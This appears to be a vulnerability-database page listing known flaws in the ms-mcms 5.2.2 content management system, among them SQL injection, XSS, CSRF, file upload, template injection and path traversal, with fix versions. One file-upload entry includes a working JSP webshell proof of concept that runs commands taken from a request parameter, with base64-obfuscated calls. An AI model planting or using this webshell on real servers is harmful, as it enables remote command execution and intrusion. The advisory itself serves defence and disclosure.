net.mingsoft:ms-mcms@5.2.2 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the net.mingsoft:ms-mcms package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the ms/template/writeFileContent.do component.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version 5.2.11 or higher.

(,5.2.11)
  • L
Cross-site Scripting (XSS)

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization when saving or updating articles.

How to fix Cross-site Scripting (XSS)?

Upgrade net.mingsoft:ms-mcms to version 5.2.11 or higher.

[0,5.2.11)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection due to improper sanitization, via the /cms/category/list endpoint.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.10 or higher.

(,5.2.10)
  • C
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via model lists in /mdiy/model/delete URI.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)
  • C
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the fieldName parameter in the /mdiy/page/verify URI.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)
  • H
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the TemplateAction class. Exploiting this vulnerability is possible by uploading a zip file to the TemplateAction API, with a jsp file, thus bypassing the file upload filter implemented in the upload functionality.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)
  • M
Cross-site Request Forgery (CSRF)

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) where it's possible to add an administrator account via ms/basic/manager/save.do.

How to fix Cross-site Request Forgery (CSRF)?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • M
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload by allowing an attacker to execute arbitrary code through a crafted ZIP file.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

(,5.2.8)
  • C
SQL Injection

Affected versions of this package are vulnerable to SQL Injection in /mdiy/dict/list/ URI via orderBy parameter.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

(,5.2.8)
  • C
SQL Injection

Affected versions of this package are vulnerable to SQL Injection in /mdiy/dict/listExcludeApp URI via the orderBy parameter.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

(,5.2.8)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the orderBy parameter at /dict/list.do.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)
  • M
Cross-site Request Forgery (CSRF)

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) via /role/saveOrUpdateRole.do which allows attackers to escalate privileges and modify data.

How to fix Cross-site Request Forgery (CSRF)?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • M
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via /cms/content/list. This is due to a lack of filtering and escaping of SQL data.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

[0,5.2.8)
  • C
Remote Code Execution (RCE)

Affected versions of this package are vulnerable to Remote Code Execution (RCE). By using a freemarker template function called Execute.

How to fix Remote Code Execution (RCE)?

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

[0,5.2.6)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the categoryId parameter in IContentDao.xml.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via search.do in the file /mdiy/dict/listExcludeApp.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

[0,5.2.6)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via search.do in /web/MCmsAction.java.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
External Control of File Name or Path

Affected versions of this package are vulnerable to External Control of File Name or Path via the oldFileName variable of the writeFileContent function. If this variable is not equal to the fileName variable, the oldFileName file gets deleted.

How to fix External Control of File Name or Path?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
Server-side Template Injection (SSTI)

Affected versions of this package are vulnerable to Server-side Template Injection (SSTI) via the Template Management module, where it is possible to add a template with a crafted payload in order to execute commands on the underlaying server.

How to fix Server-side Template Injection (SSTI)?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the /file/upload endpoint. A .jspx file will circumvent the filtering set in place and allow the attacker to get a webshell.

##PoC

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
    BASE64Decoder decoder = new BASE64Decoder();
    Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
    Process e = (Process)
            rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                    String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                    Object[]{}), request.getParameter("cmd") );
    java.io.InputStream in = e.getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>

How to fix Arbitrary File Upload?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • M
Arbitrary File Deletion

Affected versions of this package are vulnerable to Arbitrary File Deletion via the unZip() function in net/mingsoft/basic/action/TemplateAction.java, where after unzipping the file specified is deleted (whether it exists or not).

How to fix Arbitrary File Deletion?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection due to improper input sanitization in categoryId parameter in ContentBizImpl.java.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the upload method. The only files that are restricted for upload are .exe and .jsp. This can lead to RCE when a webshell with a .jspx type, for example, is uploaded this way.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version or higher.

[0,)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the IDictBiz interface, through which the value of orderBy is directly spliced into the SQL statement without any filtering, allowing to exfiltrate sensitive data.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version or higher.

[0,)
  • H
SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the IModelDataBiz interface, which requires implementing the queryDiyFormData method. The way it is implemented allows the orderBy value to be injected into the statement when resolving a GET request.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version or higher.

[0,)
  • C
Arbitrary Code Execution

Affected versions of this package are vulnerable to Arbitrary Code Execution in the New Template module. It allows attackers to upload malicious zip archives, upload a new template, and add malicious code in the template to realize command execution.

How to fix Arbitrary Code Execution?

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

(,5.2.6)
  • C
Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the com\mingsoft\basic\action\web\FileAction.java component. Since the upload interface does not verify the user login status, an attacker can use this interface to upload files without setting a cookie.

How to fix Arbitrary File Upload?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)
  • H
Directory Traversal

Affected versions of this package are vulnerable to Directory Traversal via the com\mingsoft\cms\action\GeneraterAction.java file. An attacker can write a .jsp file to an arbitrary directory via a ../ Directory Traversal in the url parameter.

How to fix Directory Traversal?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)